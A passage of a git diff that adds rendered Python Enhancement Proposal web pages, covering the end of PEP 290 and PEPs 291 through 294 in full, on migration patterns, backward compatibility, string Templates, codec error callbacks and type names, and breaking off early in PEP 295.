  3. Some dictionary-like objects may not define +iter methods:
    for k in dictlike.keys():
    +
    +
    +
  4. +
  5. Iterators do not support slicing, sorting or other operations:
    k = d.keys(); j = k[:]
    +
    +
    +
  6. +
  7. Dictionary iterators prohibit modifying the dictionary:
    for k in d.keys(): del d[k]
    +
    +
    +
  8. +
+
+
+

stat Methods

+

Replace stat constants or indices with new os.stat attributes +and methods. The os.stat attributes and methods are not +order-dependent and do not require an import of the stat module.

+

Pattern:

+
os.stat("foo")[stat.ST_MTIME]  -->  os.stat("foo").st_mtime
+os.stat("foo")[stat.ST_MTIME]  -->  os.path.getmtime("foo")
+
+
+

Locating: grep os.stat or grep stat.S

+
+
+

Reduce Dependency on types Module

+

The types module is likely to be deprecated in the future. Use +built-in constructor functions instead. They may be slightly faster.

+

Pattern:

+
isinstance(v, types.IntType)      -->  isinstance(v, int)
+isinstance(s, types.StringTypes)  -->  isinstance(s, basestring)
+
+
+

Full use of this technique requires Python 2.3 or later +(basestring was introduced in Python 2.3), but Python 2.2 is +sufficient for most uses.

+

Locating: grep types *.py | grep import

+
+
+

Avoid Variable Names that Clash with the __builtins__ Module

+

In Python 2.2, new built-in types were added for dict and file. +Scripts should avoid assigning variable names that mask those types. +The same advice also applies to existing builtins like list.

+

Pattern:

+
file = open('myfile.txt') --> f = open('myfile.txt')
+dict = obj.__dict__ --> d = obj.__dict__
+
+
+

Locating: grep 'file ' *.py

+
+
+
+

Python 2.1 or Later

+
+

whrandom Module Deprecated

+

All random-related methods have been collected in one place, the +random module.

+

Pattern:

+
import whrandom --> import random
+
+
+

Locating: grep whrandom

+
+
+
+

Python 2.0 or Later

+
+

String Methods

+

The string module is likely to be deprecated in the future. Use +string methods instead. They’re faster too.

+

Pattern:

+
import string ; string.method(s, ...)  -->  s.method(...)
+c in string.whitespace                 -->  c.isspace()
+
+
+

Locating: grep string *.py | grep import

+
+
+

startswith and endswith String Methods

+

Use these string methods instead of slicing. No slice has to be +created and there’s no risk of miscounting.

+

Pattern:

+
"foobar"[:3] == "foo"   -->  "foobar".startswith("foo")
+"foobar"[-3:] == "bar"  -->  "foobar".endswith("bar")
+
+
+
+
+

The atexit Module

+

The atexit module allows multiple functions to be executed upon program termination and also supports parameterized functions. Unfortunately, its implementation conflicts with the sys.exitfunc attribute, which only supports a single exit function. Code relying on sys.exitfunc may interfere with other modules (including library modules) that elect to use the newer and more versatile atexit module.

+

Pattern:

+
sys.exitfunc = myfunc  -->  atexit.register(myfunc)
+
+
+
+
+
+

Python 1.5 or Later

+
+

Class-Based Exceptions

+

String exceptions are deprecated, so derive from the Exception +base class. Unlike the obsolete string exceptions, class exceptions +all derive from another exception or the Exception base class. +This allows meaningful groupings of exceptions. It also allows an +“except Exception” clause to catch all exceptions.

+

Pattern:

+
NewError = 'NewError'  -->  class NewError(Exception): pass
+
+
+

Locating: Use PyChecker.

+
+
+
+

All Python Versions

+
+

Testing for None

+

Since there is only one None object, equality can be tested with +identity. Identity tests are slightly faster than equality tests. +Also, some object types may overload comparison, so equality testing +may be much slower.

+

Pattern:

+
if v == None  -->  if v is None:
+if v != None  -->  if v is not None:
+
+
+

Locating: grep '== None' or grep '!= None'

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0290.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0291/index.html b/pep-0291/index.html new file mode 100644 index 00000000000..24f8ff22fb8 --- /dev/null +++ b/pep-0291/index.html @@ -0,0 +1,353 @@ + + + + + + + + PEP 291 – Backward Compatibility for the Python 2 Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 291 – Backward Compatibility for the Python 2 Standard Library

+
+
Author:
+
Neal Norwitz <nnorwitz at gmail.com>
+
Status:
+
Superseded
+
Type:
+
Informational
+
Created:
+
06-Jun-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
Superseded-By:
+
387
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes the packages and modules in the Python 2 +standard library which should remain backward compatible with +previous versions of Python. If a package is not listed here, +then it need only remain compatible with the version of Python it +is distributed with.

+

This PEP has no bearing on the Python 3 standard library.

+
+
+

Rationale

+

Authors have various reasons why packages and modules should +continue to work with previous versions of Python. In order to +maintain backward compatibility for these modules while moving the +rest of the standard library forward, it is necessary to know +which modules can be modified and which should use old and +possibly deprecated features.

+

Generally, authors should attempt to keep changes backward +compatible with the previous released version of Python in order +to make bug fixes easier to backport.

+

In addition to a package or module being listed in this PEP, +authors must add a comment at the top of each file documenting +the compatibility requirement.

+

When a major version of Python is released, a Subversion branch is +created for continued maintenance and bug fix releases. A package +version on a branch may have a different compatibility requirement +than the same package on the trunk (i.e. current bleeding-edge +development). Where appropriate, these branch compatibilities are +listed below.

+
+
+

Features to Avoid

+

The following list contains common features to avoid in order +to maintain backward compatibility with each version of Python. +This list is not complete! It is only meant as a general guide.

+

Note that the features below were implemented in the version +following the one listed. For example, features listed next to +1.5.2 were implemented in 2.0.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Version | Features to Avoid
1.5.2 | string methods, Unicode, list comprehensions, augmented assignment (eg, +=), zip(), import x as y, dict.setdefault(), print >> f, calling f(*args, **kw), plus all features below
2.0 | nested scopes, rich comparisons, function attributes, plus all features below
2.1 | use of object or new-style classes, iterators, using generators, nested scopes, or // without from __future__ import … statement, isinstance(X, TYP) where TYP is a tuple of types, plus all features below
2.2 | bool, True, False, basestring, enumerate(), {}.pop(), PendingDeprecationWarning, Universal Newlines, plus all features below
2.3 | generator expressions, multi-line imports, decorators, int/long unification, set/frozenset, reversed(), sorted(), “”.rsplit(), plus all features below
2.4 | with statement, conditional expressions, combined try/except/finally, relative imports, yield expressions or generator.throw/send/close(), plus all features below
2.5 | with statement without from __future__ import, io module, str.format(), except as, bytes, b’’ literals, property.setter/deleter
+
+
+

Backward Compatible Packages, Modules, and Tools

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Package/Module | Maintainer(s) | Python Version | Notes
2to3 | Benjamin Peterson | 2.5 |
bsddb | Greg Smith, Barry Warsaw | 2.1 |
compiler | Jeremy Hylton | 2.1 |
decimal | Raymond Hettinger | 2.3 | [2]
distutils | Tarek Ziade | 2.3 |
email | Barry Warsaw | 2.1 / 2.3 | [1]
pkgutil | Phillip Eby | 2.3 |
platform | Marc-Andre Lemburg | 1.5.2 |
pybench | Marc-Andre Lemburg | 1.5.2 | [3]
sre | Fredrik Lundh | 2.1 |
subprocess | Peter Astrand | 2.2 |
wsgiref | Phillip J. Eby | 2.1 |
xml (PyXML) | Martin v. Loewis | 2.0 |
xmlrpclib | Fredrik Lundh | 2.1 |
+ + + + + + + + + + + + + +
Tool | Maintainer(s) | Python Version
None
+
+

Notes

+
    +
  1. The email package version 2 was distributed with Python up to +Python 2.3, and this must remain Python 2.1 compatible. email +package version 3 will be distributed with Python 2.4 and will +need to remain compatible only with Python 2.3.
  2. +
  3. Specification updates will be treated as bugfixes and backported. +Python 2.3 compatibility will be kept for at least Python 2.4. +The decision will be revisited for Python 2.5 and not changed +unless compelling advantages arise.
  4. +
  5. pybench lives under the Tools/ directory. Compatibility with +older Python versions is needed in order to be able to compare +performance between Python versions. New features may still +be used in new tests, which may then be configured to fail +gracefully on import by the tool in older Python versions.
  6. +
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0291.rst

+

Last modified: 2024-10-10 20:00:57 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0292/index.html b/pep-0292/index.html new file mode 100644 index 00000000000..a82efbccde0 --- /dev/null +++ b/pep-0292/index.html @@ -0,0 +1,318 @@ + + + + + + + + PEP 292 – Simpler String Substitutions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 292 – Simpler String Substitutions

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Jun-2002
+
Python-Version:
+
2.4
+
Post-History:
+
18-Jun-2002, 23-Mar-2004, 22-Aug-2004
+
Replaces:
+
215
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a simpler string substitution feature, also +known as string interpolation. This PEP is “simpler” in two +respects:

+
    +
  1. Python’s current string substitution feature +(i.e. %-substitution) is complicated and error prone. This PEP +is simpler at the cost of some expressiveness.
  2. +
  3. PEP 215 proposed an alternative string interpolation feature, +introducing a new $ string prefix. PEP 292 is simpler than +this because it involves no syntax changes and has much simpler +rules for what substitutions can occur in the string.
  4. +
+
+
+

Rationale

+

Python currently supports a string substitution syntax based on +C’s printf()%’ formatting character [1]. While quite rich, +%-formatting codes are also error prone, even for +experienced Python programmers. A common mistake is to leave off +the trailing format character, e.g. the ‘s’ in "%(name)s".

+

In addition, the rules for what can follow a % sign are fairly complex, while the usual application rarely needs such complexity. Most scripts need to do some string interpolation, but most of those use simple ‘stringification’ formats, i.e. %s or %(name)s. This form should be made simpler and less error prone.

+
+
+

A Simpler Proposal

+

We propose the addition of a new class, called Template, which +will live in the string module. The Template class supports new +rules for string substitution; its value contains placeholders, +introduced with the $ character. The following rules for +$-placeholders apply:

+
    +
  1. $$ is an escape; it is replaced with a single $
  2. +
  3. $identifier names a substitution placeholder matching a mapping +key of “identifier”. By default, “identifier” must spell a +Python identifier as defined in [2]. The first non-identifier +character after the $ character terminates this placeholder +specification.
  4. +
  5. ${identifier} is equivalent to $identifier. It is required +when valid identifier characters follow the placeholder but are +not part of the placeholder, e.g. "${noun}ification".
  6. +
+

If the $ character appears at the end of the line, or is followed by any character other than those described above, a ValueError will be raised at interpolation time. Values in the mapping are converted automatically to strings.

+

No other characters have special meaning, however it is possible +to derive from the Template class to define different substitution +rules. For example, a derived class could allow for periods in +the placeholder (e.g. to support a kind of dynamic namespace and +attribute path lookup), or could define a delimiter character +other than $.

+
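A minimal sketch of that derivation hook; the subclass name is hypothetical, and delimiter is the documented class attribute that controls the placeholder character:

from string import Template

class PercentTemplate(Template):
    delimiter = '%'   # use % instead of $; the other rules are unchanged

print(PercentTemplate('%greeting, %name!').substitute(
    greeting='Hello', name='Guido'))   # Hello, Guido!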

Once the Template has been created, substitutions can be performed +by calling one of two methods:

+
    +
  • substitute(). This method returns a new string which results +when the values of a mapping are substituted for the +placeholders in the Template. If there are placeholders which +are not present in the mapping, a KeyError will be raised.
  • +
  • safe_substitute(). This is similar to the substitute() method, +except that KeyErrors are never raised (due to placeholders +missing from the mapping). When a placeholder is missing, the +original placeholder will appear in the resulting string.

    Here are some examples:

    +
    >>> from string import Template
    +>>> s = Template('${name} was born in ${country}')
    +>>> print s.substitute(name='Guido', country='the Netherlands')
    +Guido was born in the Netherlands
    +>>> print s.substitute(name='Guido')
    +Traceback (most recent call last):
    +[...]
    +KeyError: 'country'
    +>>> print s.safe_substitute(name='Guido')
    +Guido was born in ${country}
    +
    +
    +
  • +
+

The signature of substitute() and safe_substitute() allows for passing the mapping of placeholders to values, either as a single dictionary-like object in the first positional argument, or as keyword arguments as shown above. The exact details and signatures of these two methods are reserved for the standard library documentation.

+
+
+

Why $ and Braces?

+

The BDFL said it best [3]: “The $ means “substitution” in so many +languages besides Perl that I wonder where you’ve been. […] +We’re copying this from the shell.”

+

Thus the substitution rules are chosen because of the similarity +with so many other languages. This makes the substitution rules +easier to teach, learn, and remember.

+
+
+

Comparison to PEP 215

+

PEP 215 describes an alternate proposal for string interpolation. +Unlike that PEP, this one does not propose any new syntax for +Python. All the proposed new features are embodied in a new +library module. PEP 215 proposes a new string prefix +representation such as $"" which signal to Python that a new type +of string is present. $-strings would have to interact with the +existing r-prefixes and u-prefixes, essentially doubling the +number of string prefix combinations.

+

PEP 215 also allows for arbitrary Python expressions inside the +$-strings, so that you could do things like:

+
import sys
+print $"sys = $sys, sys = $sys.modules['sys']"
+
+
+

which would return:

+
sys = <module 'sys' (built-in)>, sys = <module 'sys' (built-in)>
+
+
+

It’s generally accepted that the rules in PEP 215 are safe in the +sense that they introduce no new security issues (see PEP 215, +“Security Issues” for details). However, the rules are still +quite complex, and make it more difficult to see the substitution +placeholder in the original $-string.

+

The interesting thing is that the Template class defined in this +PEP is designed for inheritance and, with a little extra work, +it’s possible to support PEP 215’s functionality using existing +Python syntax.

+

For example, one could define subclasses of Template and dict that +allowed for a more complex placeholder syntax and a mapping that +evaluated those placeholders.

+
+
+

Internationalization

+

The implementation supports internationalization by recording the original template string in the Template instance’s template attribute. This attribute would serve as the lookup key in a gettext-based catalog. It is up to the application to turn the resulting string back into a Template for substitution.

+

However, the Template class was designed to work more intuitively +in an internationalized application, by supporting the mixing-in +of Template and unicode subclasses. Thus an internationalized +application could create an application-specific subclass, +multiply inheriting from Template and unicode, and using instances +of that subclass as the gettext catalog key. Further, the +subclass could alias the special __mod__() method to either +.substitute() or .safe_substitute() to provide a more traditional +string/unicode like %-operator substitution syntax.

+
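A minimal sketch of the __mod__ aliasing idea (the subclass is hypothetical and omits the unicode mix-in, which is unnecessary on Python 3 where str is already Unicode):

from string import Template

class ModTemplate(Template):
    def __mod__(self, mapping):
        return self.safe_substitute(mapping)

print(ModTemplate('$name was born in $country') % {'name': 'Guido'})
# Guido was born in $country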
+
+

Reference Implementation

+

The implementation [4] has been committed to the Python 2.4 source tree.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0292.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0293/index.html b/pep-0293/index.html new file mode 100644 index 00000000000..69c791d818b --- /dev/null +++ b/pep-0293/index.html @@ -0,0 +1,511 @@ + + + + + + + + PEP 293 – Codec Error Handling Callbacks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 293 – Codec Error Handling Callbacks

+
+
Author:
+
Walter Dörwald <walter at livinglogic.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Jun-2002
+
Python-Version:
+
2.3
+
Post-History:
+
19-Jun-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP aims at extending Python’s fixed codec error handling +schemes with a more flexible callback based approach.

+

Python currently uses a fixed error handling for codec error +handlers. This PEP describes a mechanism which allows Python to +use function callbacks as error handlers. With these more +flexible error handlers it is possible to add new functionality to +existing codecs by e.g. providing fallback solutions or different +encodings for cases where the standard codec mapping does not +apply.

+
+
+

Specification

+

Currently the set of codec error handling algorithms is fixed to +either “strict”, “replace” or “ignore” and the semantics of these +algorithms is implemented separately for each codec.

+

The proposed patch will make the set of error handling algorithms +extensible through a codec error handler registry which maps +handler names to handler functions. This registry consists of the +following two C functions:

+
int PyCodec_RegisterError(const char *name, PyObject *error)
+
+PyObject *PyCodec_LookupError(const char *name)
+
+
+

and their Python counterparts:

+
codecs.register_error(name, error)
+
+codecs.lookup_error(name)
+
+
+

PyCodec_LookupError raises a LookupError if no callback function +has been registered under this name.

+

Similar to the encoding name registry there is no way of +unregistering callback functions or iterating through the +available functions.

+

The callback functions will be used in the following way by the +codecs: when the codec encounters an encoding/decoding error, the +callback function is looked up by name, the information about the +error is stored in an exception object and the callback is called +with this object. The callback returns information about how to +proceed (or raises an exception).

+
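This registry shipped with Python 2.3 and is still available; a self-contained sketch of registering and invoking a custom encode handler (the handler name and replacement format are made up):

import codecs

def anglereplace(exc):
    # Replace each unencodable character with a visible <U+XXXX> marker.
    if isinstance(exc, UnicodeEncodeError):
        s = ''.join('<U+%04X>' % ord(c) for c in exc.object[exc.start:exc.end])
        return (s, exc.end)
    raise TypeError("can't handle %s" % exc.__class__.__name__)

codecs.register_error('anglereplace', anglereplace)
print('na\xefve'.encode('ascii', 'anglereplace'))   # b'na<U+00EF>ve'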

For encoding, the exception object will look like this:

+
class UnicodeEncodeError(UnicodeError):
+    def __init__(self, encoding, object, start, end, reason):
+        UnicodeError.__init__(self,
+            "encoding '%s' can't encode characters " +
+            "in positions %d-%d: %s" % (encoding,
+                start, end-1, reason))
+        self.encoding = encoding
+        self.object = object
+        self.start = start
+        self.end = end
+        self.reason = reason
+
+
+

This type will be implemented in C with the appropriate setter and +getter methods for the attributes, which have the following +meaning:

+
    +
  • encoding: The name of the encoding;
  • +
  • object: The original unicode object for which encode() has +been called;
  • +
  • start: The position of the first unencodable character;
  • +
  • end: (The position of the last unencodable character)+1 (or +the length of object, if all characters from start to the end +of object are unencodable);
  • +
  • reason: The reason why object[start:end] couldn’t be encoded.
  • +
+

If object has consecutive unencodable characters, the encoder should collect those characters for one call to the callback if those characters can’t be encoded for the same reason. The encoder is not required to implement this behaviour and may call the callback for every single character, but it is strongly suggested that the collecting method be implemented.

+

The callback must not modify the exception object. If the +callback does not raise an exception (either the one passed in, or +a different one), it must return a tuple:

+
(replacement, newpos)
+
+
+

replacement is a unicode object that the encoder will encode and +emit instead of the unencodable object[start:end] part, newpos +specifies a new position within object, where (after encoding the +replacement) the encoder will continue encoding.

+

Negative values for newpos are treated as being relative to the end of object. If newpos is out of bounds the encoder will raise an IndexError.

+

If the replacement string itself contains an unencodable character +the encoder raises the exception object (but may set a different +reason string before raising).

+

Should further encoding errors occur, the encoder is allowed to +reuse the exception object for the next call to the callback. +Furthermore, the encoder is allowed to cache the result of +codecs.lookup_error.

+

If the callback does not know how to handle the exception, it must +raise a TypeError.

+

Decoding works similar to encoding with the following differences:

+
    +
  • The exception class is named UnicodeDecodeError and the attribute +object is the original 8bit string that the decoder is currently +decoding.
  • +
  • The decoder will call the callback with those bytes that +constitute one undecodable sequence, even if there is more than +one undecodable sequence that is undecodable for the same reason +directly after the first one. E.g. for the “unicode-escape” +encoding, when decoding the illegal string \\u00\\u01x, the +callback will be called twice (once for \\u00 and once for +\\u01). This is done to be able to generate the correct number +of replacement characters.
  • +
  • The replacement returned from the callback is a unicode object +that will be emitted by the decoder as-is without further +processing instead of the undecodable object[start:end] part.
  • +
+

There is a third API that uses the old strict/ignore/replace error +handling scheme:

+
PyUnicode_TranslateCharmap/unicode.translate
+
+
+

The proposed patch will enhance PyUnicode_TranslateCharmap, so +that it also supports the callback registry. This has the +additional side effect that PyUnicode_TranslateCharmap will +support multi-character replacement strings (see SF feature +request #403100 [1]).

+

For PyUnicode_TranslateCharmap the exception class will be named +UnicodeTranslateError. PyUnicode_TranslateCharmap will collect +all consecutive untranslatable characters (i.e. those that map to +None) and call the callback with them. The replacement returned +from the callback is a unicode object that will be put in the +translated result as-is, without further processing.

+

All encoders and decoders are allowed to implement the callback +functionality themselves, if they recognize the callback name +(i.e. if it is a system callback like “strict”, “replace” and +“ignore”). The proposed patch will add two additional system +callback names: “backslashreplace” and “xmlcharrefreplace”, which +can be used for encoding and translating and which will also be +implemented in-place for all encoders and +PyUnicode_TranslateCharmap.

+

The Python equivalent of these five callbacks will look like this:

+
def strict(exc):
+    raise exc
+
+def ignore(exc):
+    if isinstance(exc, UnicodeError):
+        return (u"", exc.end)
+    else:
+        raise TypeError("can't handle %s" % exc.__class__.__name__)
+
+def replace(exc):
+     if isinstance(exc, UnicodeEncodeError):
+         return ((exc.end-exc.start)*u"?", exc.end)
+     elif isinstance(exc, UnicodeDecodeError):
+         return (u"\\ufffd", exc.end)
+     elif isinstance(exc, UnicodeTranslateError):
+         return ((exc.end-exc.start)*u"\\ufffd", exc.end)
+     else:
+         raise TypeError("can't handle %s" % exc.__class__.__name__)
+
+def backslashreplace(exc):
+     if isinstance(exc,
+         (UnicodeEncodeError, UnicodeTranslateError)):
+         s = u""
+         for c in exc.object[exc.start:exc.end]:
+            if ord(c)<=0xff:
+                s += u"\\x%02x" % ord(c)
+            elif ord(c)<=0xffff:
+                s += u"\\u%04x" % ord(c)
+            else:
+                s += u"\\U%08x" % ord(c)
+         return (s, exc.end)
+     else:
+         raise TypeError("can't handle %s" % exc.__class__.__name__)
+
+def xmlcharrefreplace(exc):
+     if isinstance(exc,
+         (UnicodeEncodeError, UnicodeTranslateError)):
+         s = u""
+         for c in exc.object[exc.start:exc.end]:
+            s += u"&#%d;" % ord(c)
+         return (s, exc.end)
+     else:
+         raise TypeError("can't handle %s" % exc.__class__.__name__)
+
+
+

These five callback handlers will also be accessible to Python as +codecs.strict_error, codecs.ignore_error, codecs.replace_error, +codecs.backslashreplace_error and codecs.xmlcharrefreplace_error.

+
+
+

Rationale

+

Most legacy encodings do not support the full range of Unicode characters. For these cases many high level protocols support a way of escaping a Unicode character (e.g. Python itself supports the \x, \u and \U convention, XML supports character references via &#xxx; etc.).

+

When implementing such an encoding algorithm, a problem with the +current implementation of the encode method of Unicode objects +becomes apparent: For determining which characters are unencodable +by a certain encoding, every single character has to be tried, +because encode does not provide any information about the location +of the error(s), so

+
# (1)
+us = u"xxx"
+s = us.encode(encoding)
+
+
+

has to be replaced by

+
# (2)
+us = u"xxx"
+v = []
+for c in us:
+    try:
+        v.append(c.encode(encoding))
+    except UnicodeError:
+        v.append("&#%d;" % ord(c))
+s = "".join(v)
+
+
+

This slows down encoding dramatically as now the loop through the +string is done in Python code and no longer in C code.

+

Furthermore, this solution poses problems with stateful encodings. +For example, UTF-16 uses a Byte Order Mark at the start of the +encoded byte string to specify the byte order. Using (2) with +UTF-16, results in an 8 bit string with a BOM between every +character.

+

To work around this problem, a stream writer - which keeps state +between calls to the encoding function - has to be used:

+
# (3)
+us = u"xxx"
+import codecs, cStringIO as StringIO
+writer = codecs.getwriter(encoding)
+
+v = StringIO.StringIO()
+uv = writer(v)
+for c in us:
+    try:
+        uv.write(c)
+    except UnicodeError:
+        uv.write(u"&#%d;" % ord(c))
+s = v.getvalue()
+
+
+

To compare the speed of (1) and (3) the following test script has +been used:

+
# (4)
+import time
+us = u"äa"*1000000
+encoding = "ascii"
+import codecs, cStringIO as StringIO
+
+t1 = time.time()
+
+s1 = us.encode(encoding, "replace")
+
+t2 = time.time()
+
+writer = codecs.getwriter(encoding)
+
+v = StringIO.StringIO()
+uv = writer(v)
+for c in us:
+    try:
+        uv.write(c)
+    except UnicodeError:
+        uv.write(u"?")
+s2 = v.getvalue()
+
+t3 = time.time()
+
+assert(s1==s2)
+print "1:", t2-t1
+print "2:", t3-t2
+print "factor:", (t3-t2)/(t2-t1)
+
+
+

On Linux this gives the following output (with Python 2.3a0):

+
1: 0.274321913719
+2: 51.1284689903
+factor: 186.381278466
+
+
+

i.e. (3) is 180 times slower than (1).

+

Callbacks must be stateless, because as soon as a callback is +registered it is available globally and can be called by multiple +encode() calls. To be able to use stateful callbacks, the errors +parameter for encode/decode/translate would have to be changed +from char * to PyObject *, so that the callback could be used +directly, without the need to register the callback globally. As +this requires changes to lots of C prototypes, this approach was +rejected.

+

Currently all encoding/decoding functions have arguments

+
const Py_UNICODE *p, int size
+
+
+

or

+
const char *p, int size
+
+
+

to specify the unicode characters/8bit characters to be +encoded/decoded. So in case of an error the codec has to create a +new unicode or str object from these parameters and store it in +the exception object. The callers of these encoding/decoding +functions extract these parameters from str/unicode objects +themselves most of the time, so it could speed up error handling +if these object were passed directly. As this again requires +changes to many C functions, this approach has been rejected.

+

For stream readers/writers the errors attribute must be changeable +to be able to switch between different error handling methods +during the lifetime of the stream reader/writer. This is currently +the case for codecs.StreamReader and codecs.StreamWriter and +all their subclasses. All core codecs and probably most of the +third party codecs (e.g. JapaneseCodecs) derive their stream +readers/writers from these classes so this already works, +but the attribute errors should be documented as a requirement.

+
+
+

Implementation Notes

+

A sample implementation is available as SourceForge patch #432401 +[2] including a script for testing the speed of various +string/encoding/error combinations and a test script.

+

Currently the new exception classes are old style Python +classes. This means that accessing attributes results +in a dict lookup. The C API is implemented in a way +that makes it possible to switch to new style classes +behind the scene, if Exception (and UnicodeError) will +be changed to new style classes implemented in C for +improved performance.

+

The class codecs.StreamReaderWriter uses the errors parameter for +both reading and writing. To be more flexible this should +probably be changed to two separate parameters for reading and +writing.

+

The errors parameter of PyUnicode_TranslateCharmap is not available to Python, which makes testing of the new functionality of PyUnicode_TranslateCharmap impossible from Python scripts. The patch should add an optional argument errors to unicode.translate to expose the functionality and make testing possible.

+

Codecs that do something different than encoding/decoding from/to +unicode and want to use the new machinery can define their own +exception classes and the strict handlers will automatically work +with it. The other predefined error handlers are unicode specific +and expect to get a Unicode(Encode|Decode|Translate)Error +exception object so they won’t work.

+
+
+

Backwards Compatibility

+

The semantics of unicode.encode with errors=”replace” has changed: +The old version always stored a ? character in the output string +even if no character was mapped to ? in the mapping. With the +proposed patch, the replacement string from the callback will +again be looked up in the mapping dictionary. But as all +supported encodings are ASCII based, and thus map ? to ?, this +should not be a problem in practice.

+

Illegal values for the errors argument raised ValueError before, +now they will raise LookupError.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0293.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0294/index.html b/pep-0294/index.html new file mode 100644 index 00000000000..c44e3d85035 --- /dev/null +++ b/pep-0294/index.html @@ -0,0 +1,208 @@ + + + + + + + + PEP 294 – Type Names in the types Module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 294 – Type Names in the types Module

+
+
Author:
+
Oren Tirosh <oren at hishome.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
19-Jun-2002
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes that symbols matching the type name should be added +to the types module for all basic Python types in the types module:

+
types.IntegerType -> types.int
+types.FunctionType -> types.function
+types.TracebackType -> types.traceback
+ ...
+
+
+

The long capitalized names currently in the types module will be +deprecated.

+

With this change the types module can serve as a replacement for the +new module. The new module shall be deprecated and listed in PEP 4.

+
+
+

Pronouncement

+

A centralized repository of type names was a mistake. Neither the +“types” nor “new” modules should be carried forward to Python 3.0.

+

In the meantime, it does not make sense to make the proposed updates +to the modules. This would cause disruption without any compensating +benefit.

+

Instead, the problem that some internal types (frames, functions, +etc.) don’t live anywhere outside those modules may be addressed by +either adding them to __builtin__ or sys. This will provide a +smoother transition to Python 3.0.

+
+
+

Rationale

+

Using two sets of names for the same objects is redundant and +confusing.

+

In Python versions prior to 2.2 the symbols matching many type names +were taken by the factory functions for those types. Now all basic +types have been unified with their factory functions and therefore the +type names are available to be consistently used to refer to the type +object.

+

Most types are accessible as either builtins or in the new module but +some types such as traceback and generator are only accessible through +the types module under names which do not match the type name. This +PEP provides a uniform way to access all basic types under a single +set of names.

+
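For context, since this PEP was rejected: the long capitalized names remain the only spelling today, e.g. the following runs unchanged on modern Python:

import types

def gen():
    yield 1

assert isinstance(gen(), types.GeneratorType)
assert isinstance(gen, types.FunctionType)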
+
+

Specification

+

The types module shall pass the following test:

+
import types
+for t in vars(types).values():
+    if type(t) is type:
+        assert getattr(types, t.__name__) is t
+
+
+

The types ‘class’, ‘instance method’ and ‘dict-proxy’ have already +been renamed to the valid Python identifiers ‘classobj’, +‘instancemethod’ and ‘dictproxy’, making this possible.

+
+
+

Backward compatibility

+

Because of their widespread use it is not planned to actually remove +the long names from the types module in some future version. However, +the long names should be changed in documentation and library sources +to discourage their use in new code.

+
+
+

Reference Implementation

+

A reference implementation is available in +issue #569328.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0294.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0295/index.html b/pep-0295/index.html new file mode 100644 index 00000000000..2b755c06fe6 --- /dev/null +++ b/pep-0295/index.html @@ -0,0 +1,231 @@ + + + + + + + + PEP 295 – Interpretation of multiline string constants | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 295 – Interpretation of multiline string constants

+
+
Author:
+
Stepan Koltsov <yozh at mx1.ru>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
22-Jul-2002
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes an interpretation of multiline string constants for Python. It suggests stripping spaces after newlines and stripping a newline if it is the first character after an opening quotation.

+
+
+

Rationale

+

This PEP proposes an interpretation of multiline string constants in Python. Currently, the value of a string constant is all the text between the quotations, possibly with escape sequences substituted, e.g.:

+
def f():
+    """
+    la-la-la
+    limona, banana
+    """
+
+def g():
+    return "This is \
+    string"
+
+print repr(f.__doc__)
+print repr(g())
+
+
+

prints:

+
'\n\tla-la-la\n\tlimona, banana\n\t'
+'This is \tstring'
+
+
+

This PEP suggests two things:

+
    +
• ignore the first character after the opening quotation, if it is a newline
  • +
• ignore in string constants all spaces and tabs up to the first non-whitespace character, but no more than the current indentation.
  • +
+

After applying this, the previous program will print:

+
'la-la-la\nlimona, banana\n'
+'This is string'
+
+
+

To get this result, the previous programs could be rewritten for current Python as follows (note that this gives the same result under the new string semantics):

+
def f():
+    """\
+la-la-la
